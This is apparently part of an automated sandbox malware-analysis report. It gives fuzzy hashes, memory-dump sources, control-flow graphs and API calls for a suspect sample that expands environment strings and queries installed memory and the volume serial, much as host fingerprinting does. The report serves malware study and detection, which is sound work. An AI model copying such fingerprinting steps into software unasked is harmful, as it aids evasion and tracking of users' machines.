                                                                              • Opcode Fuzzy Hash: 4ac4b503b8bb0a2366bbc4b875a438d16d67c83e7f675032e930ab3f6cef4b37
                                                                              • Instruction Fuzzy Hash: A0E169B4504B46CFD728CF24C995B27B7E5FB49304F14892DD4968BAA2EB38F806DB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 360388dec3a16638f70d016d213f201edb378a2f1e47dd28d1668d3fc4d94dad
                                                                              • Instruction ID: ba6700a6498423048bf978346611b8b1968019720e8871ab1e2a9994c91a0c1c
                                                                              • Opcode Fuzzy Hash: 360388dec3a16638f70d016d213f201edb378a2f1e47dd28d1668d3fc4d94dad
                                                                              • Instruction Fuzzy Hash: D4C1D2B1A08342CFD314CF18C992B2BB7E1EB95324F284A2DF49587382D779D846D782
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0cc998470702d5cd2ed3fe61abe2fdb08a619e3dba38207cfcef0724958f1c9e
                                                                              • Instruction ID: 0e72cfade0a024a373bba73c1ebfb2fa169d4451af405ee6946fb776093e8273
                                                                              • Opcode Fuzzy Hash: 0cc998470702d5cd2ed3fe61abe2fdb08a619e3dba38207cfcef0724958f1c9e
                                                                              • Instruction Fuzzy Hash: 87A19B70600B418FE728CF18C994B17B7E6FB58304F18891DE5AA8BB91D775F905EB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 17869769ee17407e9997250ba1d75dcd57ebbf6f245e56a4016c0fc613509f1d
                                                                              • Instruction ID: 621509000c7e6c05ee056669970e7a3f88ed05f5e9db8c483e27d25bcd447ebe
                                                                              • Opcode Fuzzy Hash: 17869769ee17407e9997250ba1d75dcd57ebbf6f245e56a4016c0fc613509f1d
                                                                              • Instruction Fuzzy Hash: 2B81AC70A083429BD318CF14C894B2BBBE2FB84768F28891DE5855B392C374DE45DB87
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a6188993119fe54b582981e868b38873023f0aad3fa1dda7c8b3ded7f818dfaa
                                                                              • Instruction ID: d9e92b36db10504719ffb74d9dcc3146dad94341a12e6c22a5d485b0ac5b9ebd
                                                                              • Opcode Fuzzy Hash: a6188993119fe54b582981e868b38873023f0aad3fa1dda7c8b3ded7f818dfaa
                                                                              • Instruction Fuzzy Hash: 9C5168746007128BC724CF28C8A1B66B3F1FF46314F188A5DD8968B7A1EB79B805DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3cab45a3fc4fe5e6a944bf8a1bb3cc5dda22061ca477091fb2895b86fe0c959
                                                                              • Instruction ID: bbf15ca33abbc4ead30ae8a4e1bc8a65f7841b3b7f8606552fa573f0131bba27
                                                                              • Opcode Fuzzy Hash: d3cab45a3fc4fe5e6a944bf8a1bb3cc5dda22061ca477091fb2895b86fe0c959
                                                                              • Instruction Fuzzy Hash: 034169709083429BE708CF04C994B2FB7E6FB95B19F58491DE0859B381D734DD06AB96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bfa37468338c0ab4c4cd1abd11552b570c07026cd623e9531e7c0aab595530ec
                                                                              • Instruction ID: ca100cb98fc56e2304c42769038f42382cfae782e356c015ecd47c70b4491579
                                                                              • Opcode Fuzzy Hash: bfa37468338c0ab4c4cd1abd11552b570c07026cd623e9531e7c0aab595530ec
                                                                              • Instruction Fuzzy Hash: 24217C746083429BE310CF04C994B2FB7E2BBC1B08F288A1DF1949B395C779DC05AB96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 241 fbd690-fbd70e 242 fbd710-fbd744 241->242 243 fbd746-fbd789 RtlExpandEnvironmentStrings 241->243 242->242 242->243 244 fbd78b-fbd790 243->244 245 fbd792 243->245 246 fbd795-fbd827 call fd3b50 RtlExpandEnvironmentStrings 244->246 245->246 249 fbd879-fbd8af 246->249 250 fbd829 246->250 252 fbd8b8-fbd8bd 249->252 253 fbd8b1-fbd8b6 249->253 251 fbd830-fbd877 250->251 251->249 251->251 254 fbd8c0-fbd8d1 call fd3b50 252->254 253->254 257 fbd8d3-fbd8d8 254->257 258 fbd8f1-fbd901 254->258 259 fbd8e0-fbd8ef 257->259 260 fbd903-fbd90a 258->260 261 fbd921-fbd932 call fd8d50 258->261 259->258 259->259 262 fbd910-fbd91f 260->262 264 fbd937-fbd954 261->264 262->261 262->262
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00FBD77D
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00FBD7A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: -^$AV$SE$X&
                                                                              • API String ID: 237503144-3017178743
                                                                              • Opcode ID: c7503d08fb8fce3a25ec47dba6283aa8c38d039ec1b6221d94cfeb10613807f8
                                                                              • Instruction ID: 6c9d2abd2f90c0734a3a2d6960375772b2a1def0dc069048bad156753c6cc501
                                                                              • Opcode Fuzzy Hash: c7503d08fb8fce3a25ec47dba6283aa8c38d039ec1b6221d94cfeb10613807f8
                                                                              • Instruction Fuzzy Hash: 24717A702083918FE724CF15D8A0BABB7E1EFC6314F154A2DE8E95B280E7749945CB93
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 265 fb4950-fb4964 266 fb4970-fb4978 265->266 266->266 267 fb497a-fb49ac RtlExpandEnvironmentStrings 266->267 268 fb49ae-fb49b3 267->268 269 fb49b5 267->269 270 fb49b8-fb4a4c call fd3b50 RtlExpandEnvironmentStrings 268->270 269->270 273 fb4a4e-fb4a4f 270->273 274 fb4a93-fb4ac3 270->274 275 fb4a50-fb4a91 273->275 276 fb4acc-fb4ace 274->276 277 fb4ac5-fb4aca 274->277 275->274 275->275 278 fb4ad1-fb4ae8 call fd3b50 276->278 277->278 281 fb4aea-fb4af3 278->281 282 fb4b11-fb4b21 278->282 283 fb4b00-fb4b0f 281->283 284 fb4b23-fb4b2a 282->284 285 fb4b41-fb4b55 call fd8ba0 282->285 283->282 283->283 286 fb4b30-fb4b3f 284->286 288 fb4b5a-fb4b76 285->288 286->285 286->286
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00FB499D
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00FB49CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: 2M#O$<Y.[$r]Nm$qrs
                                                                              • API String ID: 237503144-2765572984
                                                                              • Opcode ID: ca4e99c8f21348d4364cd97a6d920effd093dfb246e4776e88ba30a57a049701
                                                                              • Instruction ID: 239b5fbfddd5d14a054fff85795ed088b36e8f39299ecde0afd91b46b0dff6d3
                                                                              • Opcode Fuzzy Hash: ca4e99c8f21348d4364cd97a6d920effd093dfb246e4776e88ba30a57a049701
                                                                              • Instruction Fuzzy Hash: E851C0756083819BD720CF15C891BABB7E5EFC6324F054A1CF9958F382E7B4A801CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 382 fc4af5-fc4b44 383 fc4b89-fc4b92 382->383 384 fc4b46 382->384 386 fc4bab-fc4ffd 383->386 387 fc4b94-fc4b9a 383->387 385 fc4b50-fc4b87 384->385 385->383 385->385 390 fc4fff 386->390 391 fc5039-fc5042 386->391 388 fc4ba0-fc4ba9 387->388 388->386 388->388 392 fc5000-fc5037 390->392 393 fc505b-fc5065 call fd1cd0 391->393 394 fc5044-fc504a 391->394 392->391 392->392 397 fc506a-fc5076 393->397 396 fc5050-fc5059 394->396 396->393 396->396 398 fc5078-fc507f 397->398 399 fc508b-fc50b0 call fd8070 397->399 400 fc5080-fc5089 398->400 402 fc50b5-fc50d8 GetPhysicallyInstalledSystemMemory 399->402 400->399 400->400 403 fc512e-fc513b 402->403 404 fc50da-fc50e3 402->404 407 fc5153-fc51b9 403->407 405 fc513d-fc5142 404->405 406 fc50e5 404->406 411 fc5144-fc5150 405->411 412 fc5121-fc512c 405->412 410 fc50f0-fc511a 406->410 408 fc51bb 407->408 409 fc5203-fc5255 407->409 413 fc51c0-fc5201 408->413 414 fc52a7-fc52ad 409->414 415 fc5257 409->415 410->410 416 fc511c-fc511f 410->416 411->407 412->407 413->409 413->413 418 fc52af-fc52b2 414->418 419 fc52cb-fc52d3 414->419 417 fc5260-fc52a5 415->417 416->411 416->412 417->414 417->417 420 fc52c0-fc52c9 418->420 421 fc52eb-fc52f7 419->421 422 fc52d5-fc52d6 419->422 420->419 420->420 424 fc52f9-fc52ff 421->424 425 fc530b-fc53a2 421->425 423 fc52e0-fc52e9 422->423 423->421 423->423 428 fc5300-fc5309 424->428 426 fc53a4 425->426 427 fc53e3-fc53ec 425->427 429 fc53b0-fc53e1 426->429 430 fc53ee-fc53f4 427->430 431 fc540b-fc5417 427->431 428->425 428->428 429->427 429->429 432 fc5400-fc5409 430->432 433 fc5419-fc541f 431->433 434 fc542b-fc54cc 431->434 432->431 432->432 435 fc5420-fc5429 433->435 435->434 435->435
                                                                              APIs
                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00FC50BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                              • String ID: M:h:$P6D+$hFt=
                                                                              • API String ID: 3960555810-4191368970
                                                                              • Opcode ID: e2de49273bca80347a0adfb55d4448154ede78fb2f20c0a72551ce961f8c3997
                                                                              • Instruction ID: 71845d7a0b691bac498e8eab2975088d170d24bda50826eeb250b23d1f5f4128
                                                                              • Opcode Fuzzy Hash: e2de49273bca80347a0adfb55d4448154ede78fb2f20c0a72551ce961f8c3997
                                                                              • Instruction Fuzzy Hash: F2F14D70544F828BD726CF35C468BE3BBE1AB56308F44496DC0EB8B692C779B44ADB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 436 fc4f8f-fc4ffd call fcc4d0 call fa8700 442 fc4fff 436->442 443 fc5039-fc5042 436->443 444 fc5000-fc5037 442->444 445 fc505b-fc5076 call fd1cd0 443->445 446 fc5044-fc504a 443->446 444->443 444->444 450 fc5078-fc507f 445->450 451 fc508b-fc50d8 call fd8070 GetPhysicallyInstalledSystemMemory 445->451 448 fc5050-fc5059 446->448 448->445 448->448 452 fc5080-fc5089 450->452 455 fc512e-fc513b 451->455 456 fc50da-fc50e3 451->456 452->451 452->452 459 fc5153-fc51b9 455->459 457 fc513d-fc5142 456->457 458 fc50e5 456->458 463 fc5144-fc5150 457->463 464 fc5121-fc512c 457->464 462 fc50f0-fc511a 458->462 460 fc51bb 459->460 461 fc5203-fc5255 459->461 465 fc51c0-fc5201 460->465 466 fc52a7-fc52ad 461->466 467 fc5257 461->467 462->462 468 fc511c-fc511f 462->468 463->459 464->459 465->461 465->465 470 fc52af-fc52b2 466->470 471 fc52cb-fc52d3 466->471 469 fc5260-fc52a5 467->469 468->463 468->464 469->466 469->469 472 fc52c0-fc52c9 470->472 473 fc52eb-fc52f7 471->473 474 fc52d5-fc52d6 471->474 472->471 472->472 476 fc52f9-fc52ff 473->476 477 fc530b-fc53a2 473->477 475 fc52e0-fc52e9 474->475 475->473 475->475 480 fc5300-fc5309 476->480 478 fc53a4 477->478 479 fc53e3-fc53ec 477->479 481 fc53b0-fc53e1 478->481 482 fc53ee-fc53f4 479->482 483 fc540b-fc5417 479->483 480->477 480->480 481->479 481->481 484 fc5400-fc5409 482->484 485 fc5419-fc541f 483->485 486 fc542b-fc54cc 483->486 484->483 484->484 487 fc5420-fc5429 485->487 487->486 487->487
                                                                              APIs
                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00FC50BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                              • String ID: M:h:$P6D+$hFt=
                                                                              • API String ID: 3960555810-4191368970
                                                                              • Opcode ID: 2c20f48c5be9ce7744b2da780b2bea8fcfa91da1d7c2e9c85f62bef04a412e4a
                                                                              • Instruction ID: fa7e3ae7a808055796c9fd4c8f9d5d11f55c4765c2f2954da7e3fd7f52cd8fc0
                                                                              • Opcode Fuzzy Hash: 2c20f48c5be9ce7744b2da780b2bea8fcfa91da1d7c2e9c85f62bef04a412e4a
                                                                              • Instruction Fuzzy Hash: 2ED15D70504F428BD726CF35C468BE7BBE1AB56308F44496DC0EA8B692C779B44ADB50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 488 fbdf50-fbe009 489 fbe00b 488->489 490 fbe059-fbe099 RtlExpandEnvironmentStrings 488->490 491 fbe010-fbe057 489->491 492 fbe09b-fbe0a0 490->492 493 fbe0a2 490->493 491->490 491->491 494 fbe0a5-fbe12e call fd3b50 RtlExpandEnvironmentStrings 492->494 493->494 497 fbe16d-fbe17a call fb7810 494->497 498 fbe130-fbe16b 494->498 500 fbe17f-fbe182 497->500 498->497 498->498
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 00FBE08D
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 00FBE0BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID: ru$M3
                                                                              • API String ID: 237503144-652937946
                                                                              • Opcode ID: 43421ff772f3b358fc75a24f22e8f3b3efdfffa3f5b479b07b0c7577ea99d178
                                                                              • Instruction ID: 1cd0cbcef71808e96e84a9efa015fe0d67f54a51bf7d0a4e6856d56426844dbd
                                                                              • Opcode Fuzzy Hash: 43421ff772f3b358fc75a24f22e8f3b3efdfffa3f5b479b07b0c7577ea99d178
                                                                              • Instruction Fuzzy Hash: BA5131B1508381AFE714CF01C890B9BBBE5FBC9394F10892DF8A55B381C775DA468B92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 501 fd1dd5-fd1e35 call fd8070 GetVolumeInformationW
                                                                              APIs
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00FD1E18
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InformationVolume
                                                                              • String ID: :$C$\
                                                                              • API String ID: 2039140958-3809124531
                                                                              • Opcode ID: 0e10f8176a41199a1d99d2508125aeaf79043e5ec9fbd46260604d959d1d8b58
                                                                              • Instruction ID: 84c1b27f7b580399c5d97c21aee913260ced53ae9a7198482d048b53987db461
                                                                              • Opcode Fuzzy Hash: 0e10f8176a41199a1d99d2508125aeaf79043e5ec9fbd46260604d959d1d8b58
                                                                              • Instruction Fuzzy Hash: CBF06570254341BBE324CF10EC6AF1672A4DF45B44F20881DB2459A2D0D7B5BA19AA59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
